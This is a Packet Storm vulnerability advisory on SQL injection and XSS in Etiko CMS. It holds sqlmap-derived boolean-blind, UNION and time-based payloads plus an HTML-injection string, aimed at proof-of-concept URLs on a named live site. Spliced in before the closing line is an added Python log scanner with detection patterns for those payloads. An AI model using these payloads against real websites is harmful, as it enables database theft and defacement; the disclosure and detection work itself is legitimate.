Etiko CMS Cross Site Scripting / SQL Injection

2014-10-13T00:00:00
ID PACKETSTORM:128644
Type packetstorm
Reporter Renzi
Modified 2014-10-13T00:00:00

Description

# SQL Injection & XSS on Etiko CMS.  
  
# Risk: High  
  
# CWE number: CWE-89,CWE-79  
  
# Date: 13/10/2014  
  
# Vendor: www.etikweb.com  
  
# Version: All  
  
# Author: Felipe " Renzi " Gabriel  
  
# Contact: renzi@linuxmail.org  
  
# Tested on: Windows 8 ; Chrome ; Sqlmap 1.0-dev-nongit-20140906  
  
# Vulnerable Files: /index.php & /loja/index.php  
  
# Exploits: http://www.target.com/loja/index.php?page_id=19 [XSS] & [SQLi]  
  
http://www.target.com/index.php?article_id=16 [SQLi] & [XSS]  
  
  
  
  
# PoC: http://www.centrovegetariano.org/loja/index.php?page_id=19   
  
http://www.centrovegetariano.org/index.php?article_id=16  
  
  
--- "SQLI using SQLMAP."---   
  
---  
Place: GET  
Parameter: page_id  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: page_id=19' AND 3987=3987 AND 'Tulh'='Tulh  
  
Type: UNION query  
Title: MySQL UNION query (NULL) - 3 columns  
Payload: page_id=-5362' UNION ALL SELECT NULL,NULL,CONCAT(0x7175616f71,0x467a784a6e62664d5a79,0x716b756271)#  
  
Type: AND/OR time-based blind  
Title: MySQL > 5.0.11 AND time-based blind  
Payload: page_id=19' AND SLEEP(5) AND 'mntS'='mntS  
---  
  
---  
Place: GET  
Parameter: article_id  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: article_id=16' AND 8044=8044 AND 'yKZe'='yKZe  
  
Type: UNION query  
Title: MySQL UNION query (NULL) - 10 columns  
Payload: article_id=-2752' UNION ALL SELECT 60,60,60,60,60,60,CONCAT(0x7167687671,0x6d54706b774f4a6f667a,0x7172707a71),60,60,60#  
  
Type: AND/OR time-based blind  
Title: MySQL > 5.0.11 AND time-based blind  
Payload: article_id=16' AND SLEEP(5) AND 'MDwY'='MDwY  
---  
  
  
  
--- " XSS using HTML injection."---  
  
http://www.centrovegetariano.org/loja/index.php?page_id=19"><marquee>XSS</marquee>  
  
http://www.centrovegetariano.org/index.php?article_id=16"><marquee>XSS</marquee>  
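As an added example (not part of the advisory or of Etiko CMS), a small access-log check that flags the three sqlmap injection classes reported above and the HTML injection on the two vulnerable files, by percent-decoding each request's page_id / article_id value before matching. The log lines are constructed and the signature patterns are my own assumptions, not anything the advisory specifies.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (not from any real server) carrying the
# advisory's page_id / article_id payloads, URL-encoded as a client would send them.
SAMPLE_LOG = """\
203.0.113.5 - - [13/Oct/2014:10:00:01 +0000] "GET /loja/index.php?page_id=19 HTTP/1.1" 200 5120
203.0.113.5 - - [13/Oct/2014:10:00:02 +0000] "GET /loja/index.php?page_id=19%27%20AND%203987%3D3987%20AND%20%27Tulh%27%3D%27Tulh HTTP/1.1" 200 5120
203.0.113.5 - - [13/Oct/2014:10:00:03 +0000] "GET /loja/index.php?page_id=-5362%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x7175616f71%2C0x467a784a6e62664d5a79%2C0x716b756271%29%23 HTTP/1.1" 200 5300
203.0.113.5 - - [13/Oct/2014:10:00:09 +0000] "GET /index.php?article_id=16%27%20AND%20SLEEP%285%29%20AND%20%27MDwY%27%3D%27MDwY HTTP/1.1" 200 5120
203.0.113.5 - - [13/Oct/2014:10:00:10 +0000] "GET /index.php?article_id=16%22%3E%3Cmarquee%3EXSS%3C%2Fmarquee%3E HTTP/1.1" 200 5120
"""

# Request line inside a Common Log Format entry.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# The two vulnerable files named in the advisory and the parameter each one reads.
WATCHED = {"/index.php": "article_id", "/loja/index.php": "page_id"}

# One assumed signature per injection class sqlmap reported, plus the HTML injection.
# Checked against the *decoded* parameter value, so URL-encoding does not hide them.
SIGNATURES = [
    ("time-based blind SQLi", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    ("union-based SQLi", re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)),
    ("boolean-based blind SQLi", re.compile(r"['\"]\s*(and|or)\s+\S+\s*=\s*\S+", re.I)),
    ("HTML injection / XSS", re.compile(r"['\"]\s*>\s*<\s*/?[a-z]", re.I)),
]

def classify_value(value):
    """Return the labels of every signature that matches one decoded parameter value."""
    return [label for label, rx in SIGNATURES if rx.search(value)]

def scan_log(text):
    """Return (path, parameter, labels) for each request whose watched parameter is suspicious."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.search(line)
        if not m:
            continue  # not a request line we understand
        parts = urlsplit(m.group("target"))
        param = WATCHED.get(parts.path)
        if param is None:
            continue  # request is not for one of the vulnerable files
        # parse_qs percent-decodes the value, so the check sees the raw payload.
        for value in parse_qs(parts.query, keep_blank_values=True).get(param, []):
            labels = classify_value(value)
            if labels:
                hits.append((parts.path, param, labels))
    return hits
```

On the application side the same two parameters should be bound as integers in prepared statements and HTML-escaped on output, which addresses both CWE-89 and CWE-79 at once.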
  
  
  
# Thanks  